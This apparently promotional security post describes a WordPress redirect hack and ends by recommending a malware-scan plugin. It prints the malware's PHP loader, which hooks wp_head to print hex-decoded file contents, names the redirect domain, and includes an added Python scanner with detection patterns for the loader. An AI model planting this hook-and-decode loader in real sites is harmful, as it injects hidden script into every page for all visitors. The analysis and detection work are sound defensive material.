There has been a recent increase in cases of redirect hacks where WordPress sites are redirected to another site for robot verification without permission. Here are some examples of this malware embedding and how to deal with it.

Characteristics and Symptoms of Malware

With the code shown below, this malware embeds malicious JavaScript code in the header of a WordPress site and sends users who access the site to a fake robot-verification page.
This type of malware is called a redirect hack.

add_action('wp_head', 'get_hex_cache', 12);
function get_hex_cache()
{
    return print(@hex2bin( 'number' . (file_get_contents(__DIR__ .' /_inc.tmp'))));
}

This code hooks into the WordPress header output (wp_head), reads the malicious code body from a file called _inc.tmp, hex-decodes it, and prints it, so the malware is embedded in the header of every page on the site.

The malicious code often sends the user to a domain named guesswhatnews.com. The site’s content becomes unreadable, so the user cannot view it and may accidentally install a virus from the malicious destination page.

Detecting and Removing Malware

This malware is not easy to detect because it embeds malicious code everywhere in themes, plugins, and core files on your site.
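As a starting point for a manual check, the following added example (not part of the original article and not the plugin's code) walks a WordPress directory tree and flags PHP files that print hex-decoded file contents, as the loader above does, along with non-PHP files that consist only of hex and decode to script markup. The regular expressions, the "script" keyword test, and the sample tree built by demo() are assumptions made for illustration.

```python
import binascii, os, re, tempfile

# Heuristics modelled on the loader shown above (assumptions, not a vendor signature set).
LOADER_RE = re.compile(rb"hex2bin\s*\([^;]*file_get_contents\s*\(", re.I)
HOOK_RE = re.compile(rb"add_action\s*\(\s*['\"]wp_head['\"]", re.I)
HEX_BLOB_RE = re.compile(rb"\A\s*[0-9a-fA-F]{32,}\s*\Z")

def decode_hex_blob(data):
    """Decode a file that is nothing but hex digits; return None otherwise."""
    if not HEX_BLOB_RE.match(data):
        return None
    digits = data.strip()
    if len(digits) % 2:  # a prefix added by the loader can leave an odd nibble
        digits = digits[1:]
    return binascii.unhexlify(digits)

def scan_tree(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower().endswith(".php") and LOADER_RE.search(data):
                findings.append((rel, "hex loader on wp_head" if HOOK_RE.search(data) else "hex loader"))
            elif not name.lower().endswith(".php"):
                decoded = decode_hex_blob(data)
                if decoded and b"script" in decoded.lower():
                    findings.append((rel, "hex-encoded script payload"))
    return sorted(findings)

def demo():
    """Build a constructed sample tree (harmless placeholder payload) and scan it."""
    loader = (b"<?php add_action('wp_head', 'get_hex_cache', 12);\nfunction get_hex_cache() {\n"
              b"  return print(@hex2bin(file_get_contents(__DIR__ . '/_inc.tmp')));\n}\n")
    payload = binascii.hexlify(b"<script>/* constructed placeholder */</script>")
    files = {"x.php": loader, "_inc.tmp": payload, "ok.php": b"<?php add_action('wp_head', 'print_meta');\n"}
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "wp-content", "plugins", "x")
        os.makedirs(plugin)
        for name, body in files.items():
            with open(os.path.join(plugin, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Call scan_tree() with the path of the WordPress installation; a hit is a lead to review by hand, since legitimate code can also use hex2bin.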

Free WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

If you have any malware or viruses on your computer, you can detect and remove them by using the “WordPress:Malware Scanning & Security Plug-in”.
We hope you will give it a try.